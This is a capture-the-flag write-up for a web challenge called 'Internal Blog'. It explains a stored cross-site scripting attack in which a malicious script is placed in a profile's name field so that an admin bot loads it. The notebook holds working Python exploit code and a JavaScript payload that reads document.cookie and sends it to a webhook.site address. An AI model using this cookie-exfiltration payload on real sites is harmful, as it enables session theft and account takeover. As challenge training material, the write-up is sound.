# Internal Blog

You’ve received an anonymous tip from the Airship Mail Delivery Company claiming that a seemingly legitimate website is actually a front for trading stolen submarine mechanical parts. Yeah, that’s oddly specific...

The localhost port is 3000. Take a closer look and see if you can uncover anything suspicious. The flag to find is the bot's cookie.

## Observations:

We see on homepage that the code to detect xss is executed after the user is created in DB.
We should be able to create a user with xss payload in the username and then just post a blog with our created user so that the admin loads our xss.

In [1]:
import requests, bs4, uuid

sess = requests.Session()
def fetch_profile_creation_page():
    r = sess.get("http://challenges.hackday.fr:61394/profile")
    r.raise_for_status()
    bs = bs4.BeautifulSoup(r.text, "html.parser")
    token_value = bs.find("p", id="token-value").text
    contact_id = bs.find("input", id="id").get("value")
    return {
        "token": token_value,
        "id": contact_id
    }

SCRIPT_PAYLOAD = """
<script>
    const params = new FormData();
    params.append("location", document.location.href);
    params.append("cookie", document.cookie);

    document.location = "https://webhook.site/85425413-cb7b-414e-9dca-7884b92e8591?" + new URLSearchParams(params);
</script>
"""

def create_profile():
    data = fetch_profile_creation_page()
    username = uuid.uuid4().hex[:8]
    data.update({
        "username": username,
        "name": SCRIPT_PAYLOAD,
        "description": "Just a chill guy",
        "place": "Paris",
        "isVerified": True
    })

    print("Creating profile for user", data)
    r = sess.post("http://challenges.hackday.fr:61394/profile", data=data)
    print(r.text)
    r.raise_for_status()
    return data

def fetch_user_page(token):
    r = sess.get("http://challenges.hackday.fr:61394/user?token={}".format(token))
    r.raise_for_status()
    return r.text
p = create_profile()

print(fetch_user_page(p["token"]))

Creating profile for user {'token': '211abf30-1714-4226-b70c-450db91674ed', 'id': 'c1b7b740-d3b0-4c30-b9d2-a922741ef104', 'username': 'f12d6842', 'name': '\n<script>\n    const params = new FormData();\n    params.append("location", document.location.href);\n    params.append("cookie", document.cookie);\n\n    document.location = "https://webhook.site/85425413-cb7b-414e-9dca-7884b92e8591?" + new URLSearchParams(params);\n</script>\n', 'description': 'Just a chill guy', 'place': 'Paris', 'isVerified': True}
XSS detected !!!!!


HTTPError: 500 Server Error: Internal Server Error for url: http://challenges.hackday.fr:61394/profile

Now you just have to create a post using your created token and admin cookies will be exfiltrated.